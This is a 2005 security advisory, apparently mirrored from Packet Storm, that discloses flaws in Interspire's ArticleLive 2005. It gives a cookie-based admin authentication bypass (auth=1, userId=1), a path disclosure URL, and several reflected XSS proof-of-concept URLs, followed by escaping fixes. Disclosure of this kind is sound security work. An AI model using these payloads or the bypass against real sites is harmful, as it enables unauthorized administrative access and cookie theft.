Lucene search
K

articleLive2005.txt

🗓️ 15 Jul 2005 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Authentication bypass, sql injections and xss in ArticleLive 2005. Vendor: Interspire Summary: There are authentication bypass, sql injections and xss in articlelive 2005. Proof of Concept Exploits: Full administrative authentication bypass, Full Path Disclosure, XSS. Possible Fixes: usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string()

Code
`  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah  
  
***SPECIAL OFFER***  
Hire my auditing services, if I dont find anything, its FREE..!! http://www.digitalparadox.org/services.ah  
  
Looking for Publishers intrested in my Php Secure Coding Book.  
  
  
Severity: High  
Title: Authentication bypass, sql injections and xss in ArticleLive 2005  
Date: 04/05/2005  
  
Vendor: Interspire  
Vendor Website: http://www.interspire.com/articlelive/  
Summary: There are, authentication bypass, sql injections and xss in articlelive 2005.  
  
  
Proof of Concept Exploits:   
  
http://www.example.com/admin/?  
Full administrative authentication bypass  
  
In the control panel, by setting your cookie to auth=1 and userId=1 would give you full administrative access.  
  
  
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='Information DisclosureCategories=0  
Full Path Disclosure  
  
Warning: Wrong datatype for second argument in call to in_array in   
/home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on line 460  
  
Warning: Bad arguments to implode() in /home/httpd/vhosts/example.com/httpdocs/templates/Default   
(Stretched)/Panels/SearchResultsPanel.php on line 163  
  
  
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0  
XSS  
  
  
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab  
XSS  
  
  
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab  
XSS  
  
  
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab  
XSS  
  
  
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab  
XSS  
  
  
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab  
XSS  
  
  
http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>  
XSS  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input   
validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:   
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel   
free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation